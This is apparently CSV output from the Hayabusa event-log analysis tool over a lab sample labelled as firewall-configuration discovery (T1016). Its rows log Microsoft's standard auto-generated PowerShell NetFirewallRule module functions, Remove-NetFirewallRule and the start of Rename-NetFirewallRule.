@('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdlet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] 